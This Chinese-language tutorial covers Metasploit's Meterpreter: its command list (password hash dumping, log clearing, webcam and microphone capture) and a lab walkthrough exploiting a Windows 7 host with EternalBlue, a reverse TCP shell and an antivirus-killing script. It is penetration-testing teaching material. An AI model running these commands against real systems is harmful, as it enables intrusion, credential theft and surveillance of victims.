meterpreter介绍
meterpreter是一个高级、动态、可扩展的payload
- meterpreter上下文利用更多漏洞发起攻击
- 后渗透测试阶段一站式操作界面
采用完全基于内存的DLL注入式payload
- 注入到合法系统进程并建立stager
- 基于stager上传和预加载DLL进行扩展模块的注入
- 基于stager建立的socket连接建立加密的TLS/1.0通信隧道
- 利用TLS隧道进一步加载后扩展模块(避免网络取证)0
meterpreter命令介绍
help 查看帮助信息
background 退出当前会话
run 运行一个meterpreter脚本或者post模块(目标主机屏幕会显示)
bgrun 在后台运行一个meterpreter脚本或者post模块
cd 切换目录
ls 列出当前目录所含文件及子目录
dir 列出当前目录所含文件及子目录
pwd 查看当前所在目录
cat 查看文件具体内容
mkdir 新建文件夹
mv 移动文件或文件夹
rm 删除文件
rmdir 删除文件夹
edit 编辑文件
lpwd 查看kali当前所在目录
lcd 切换kali本机目录
clearev 清除靶机日志
download 从靶机上下载文件到本机
upload 上传文件到靶机
excute 使用命令让靶机运行软件
getuid 查看uid
getsystem 获得system权限
getprivs 查看自己当前的权限
getproxy 查看浏览器代理
getpid 查看meterpreter注入操作系统进程的pid
migrate 更改注入的pid
hashdump 以hash的形式展示密码
sysinfo 查看系统基本信息
ps 查看系统进程
kill 结束进程
reboot 重新启动靶机
shutdown 关闭靶机
shell 获取靶机shell
show_mount 查看靶机磁盘基本信息
search 在靶机上搜索指定文件
arp 查看arp列表
netstat 查看靶机网络连接情况
ipconfig 查看靶机IP地址
ifconfig 查看靶机IP地址
route 查看靶机路由表
idletime 查看目标操作系统空闲时间
resource 执行含有meterpreter命令的文件
record_mic 记录靶机麦克风的声音
webcam_list 列出靶机摄像头列表
wecam_chat 开启靶机摄像头,在kali开始监视端
流程需求
- kali攻击机 192.168.3.26
- windows7 靶机 192.168.3.28
实例演示-利用meterpreter入侵系统
1.利用ms17_010(永恒之蓝)入侵windows7靶机。
use exploit/windows/smb/ms17_010_eternalbiue
2.设置靶机IP地址
set rhost 192.168.3.28
3.使用 meterpreter反向tcp连接payload。
set payload windows/meterpreter/reverse_tcp
4.设置回连IP地址
set lhost 192.168.3.26
5.执行命令,开始入侵。
run
实例演示-bgrun命令运用
1.当获得meterpreter时,输入bgrun,按回车键,然后就可以看到可执行的模块。
2.比如运行关闭杀毒软件,有利于我们对靶机进一步控制。
bgrun killav
python扩展
1.meterpreter还支持python扩展,首先我们安装python。
load python
2.安装成功后我们运行\”help\”命令,可以在最后面看到关于python的用法
到此就完成了meterpreter的命令以及用法介绍,如果想了解更多的Kali工具,请关注我!